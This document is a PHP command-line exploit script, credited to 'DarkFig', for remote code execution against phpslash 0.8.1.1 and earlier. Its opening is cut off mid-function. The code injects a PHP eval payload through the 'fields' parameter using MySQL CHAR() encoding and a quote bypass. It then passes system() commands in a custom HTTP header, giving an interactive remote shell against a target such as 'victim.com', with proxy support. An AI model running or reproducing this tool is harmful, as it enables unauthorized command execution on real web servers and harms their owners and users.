#!/usr/bin/php -q
agent( 'Mozilla Firefox' );

        // Hey ya :)
        head();

        // Target
        $url = get_p( 'url', true );

        // Proxy options
        $prh = get_p( 'proxhost' );
        $pra = get_p( 'proxauth' );

        // Use a proxy ?
        if( $prh )
        {
                // host:ip
                $web->proxy( $prh );

                // Authentication
                if( $pra )
                $web->proxyauth( $pra );
        }

        // Single quote bypass
        $byp = "1');";

        // PHP code
        $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';

        // Separator
        $s_sep = md5( rand( 0, 1000000000 ) . 'HEY_YA' );
        $c_sep = "print('$s_sep');";

        // Final PHP code
        $final = $byp . $c_sep  . $php . $c_sep  . 'exit();//';

        // Welcome guess !
        while( ($cmd = cmd_prompt()) !== false )
        {
                // magic_quotes_gpc bypass
                $web->addheader( 'MypCode', base64_encode( 'system("' . add_slashes($cmd) . '");' ) );

                // Go =]
                $web->get( $url . 'index.php?fields=' . to_char( $final ) . ',1' );

                // Result
                $res = explode( $s_sep, $web->getcontent() );

                // Erf
                if( !isset( $res[1] ) )
                {
                        print "\nFailed";
                        exit(1);
                }
                // Cool
                else
                {
                        if( empty( $res[1] ) )
                        print "\nNo output: system() disabled OR cmd failed OR cmd without output";

                        else
                        print "\n" . $res[1];
                }
        }

        return;
}

// No more bug with " and $
function add_slashes( $str )
{
        return str_replace( '$', '\\$', addslashes( $str ) );
}

// Command prompt
function cmd_prompt()
{
        print "\nshell>";

        $cmd = trim( fgets( STDIN ) );

        // Wanna stop =( ?
        if( in_array( strtolower( $cmd ) , array( 'exit', 'quit' ) ) )
        return false;

        else
        return $cmd;
}

// MySQL CHAR() encoding
function to_char( $data )
{
        $chars = 'CHAR(';
        $len   = strlen( $data );

        for( $i = 0; $i < $len; $i++ )
        {
                $chars .= ord( $data[ $i ] );

                if( $i != $len-1 )
                $chars .= ',';
        }

        return $chars . ')';
}

// CLI params
function get_p( $p, $exit = false )
{
        foreach( $_SERVER['argv'] as $key => $value )
        {
                if( $value === '-' . $p )
                {
                        if( isset( $_SERVER['argv'][ $key+1 ] ) &&
                           !empty( $_SERVER['argv'][ $key+1 ] ) )
                        {
                                return $_SERVER['argv'][ $key+1 ];
                        }
                        else
                        {
                                if( $exit )
                                usage();

                                return true;
                        }
                }
        }

        if( $exit )
        usage();

        return false;
}

// Headers =)
function head()
{
        print "\nphpslash <= 0.8.1.1 Remote Code Execution Exploit\n";
        print "-------------------------------------------------\n\n";
        print " About: \n";
        print "  by DarkFig  < gmdarkfig (at) gmail (dot) com >\n";
print " http://acid-root.new.fr/\n";
print " #acidroot@irc.worldnet.net\n\n";

        return;
}

// Usage, can help..
function usage()
{
        print " Usage:\n";
        print "  php spl.php -url  [options]\n\n";
        print " Example:\n";
print " php spl.php -url http://victim.com/\n\n";
        print " Options:\n";
        print "  -proxhost  if you wanna use a proxy\n";
        print "  -proxauth  proxy with authentication\n";

        exit(0);
}

// Run baby
main();

?>